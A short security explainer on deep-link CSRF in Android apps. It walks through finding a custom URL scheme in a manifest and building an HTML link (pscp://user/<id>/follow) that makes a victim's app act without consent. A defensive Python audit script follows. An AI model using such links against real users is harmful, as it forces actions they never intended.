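What is DeepLinks (CSRF)?
In the context of CSRF (Cross-Site Request Forgery), DeepLinks refers to an attack vector that abuses the deep-linking functionality of mobile or web applications: a link placed on a web page opens the application and triggers an action there (such as following a user) that the victim never intended.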
Exploitation
# Find the android:scheme (via the manifest)
Example:
<data android:host="user" android:pathPrefix="/" android:scheme="pscp"/>
<data android:host="user" android:pathPrefix="/" android:scheme="pscpd"/>
--------------------------------------------------------------------------------
# Find the path URL
pscp://user/<any user-id>/follow
--------------------------------------------------------------------------------
# Build the CSRF link (clicked on a web page, it opens the application)
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
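
For reviewing your own app against the steps above, an added example (not part of the original notes): a Python audit that reads an AndroidManifest.xml, merges the <data> elements of each intent filter, and marks which deep-link prefixes a web page can fire. The manifest is constructed around the page's two <data> lines; .UserActivity, .SettingsActivity and audit_deep_links are assumed names, and only pathPrefix is handled.

```python
import xml.etree.ElementTree as ET
from itertools import product

A = "{http://schemas.android.com/apk/res/android}"  # android: XML namespace
BROWSABLE = "android.intent.category.BROWSABLE"

# Constructed manifest: only the two pscp/pscpd <data> lines come from the page.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
 <application>
  <activity android:name=".UserActivity" android:exported="true">
   <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:host="user" android:pathPrefix="/" android:scheme="pscp"/>
    <data android:host="user" android:pathPrefix="/" android:scheme="pscpd"/>
   </intent-filter>
  </activity>
  <activity android:name=".SettingsActivity" android:exported="false">
   <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <data android:host="settings" android:scheme="pscp"/>
   </intent-filter>
  </activity>
 </application>
</manifest>"""

def audit_deep_links(manifest_xml):
    """List registered deep-link prefixes; web_reachable = exported + BROWSABLE."""
    findings = []
    for act in ET.fromstring(manifest_xml).iter("activity"):
        # A missing android:exported is treated as exported (conservative).
        exported = act.get(A + "exported", "true") == "true"
        for flt in act.findall("intent-filter"):
            cats = {c.get(A + "name") for c in flt.findall("category")}
            datas = flt.findall("data")
            # <data> elements in one filter merge, so take the cross product.
            schemes = sorted({d.get(A + "scheme") for d in datas} - {None})
            hosts = sorted({d.get(A + "host") for d in datas} - {None}) or ["*"]
            paths = sorted({d.get(A + "pathPrefix") for d in datas} - {None}) or [""]
            for s, h, p in product(schemes, hosts, paths):
                findings.append({
                    "activity": act.get(A + "name"),
                    "uri": f"{s}://{h}{p}",
                    "custom_scheme": s.lower() not in ("http", "https"),
                    "web_reachable": exported and BROWSABLE in cats,
                })
    return findings
```

Call audit_deep_links(SAMPLE_MANIFEST), or pass the text of a decoded manifest. Every web_reachable entry whose handler changes state, like the follow path above, should ask for in-app confirmation before acting.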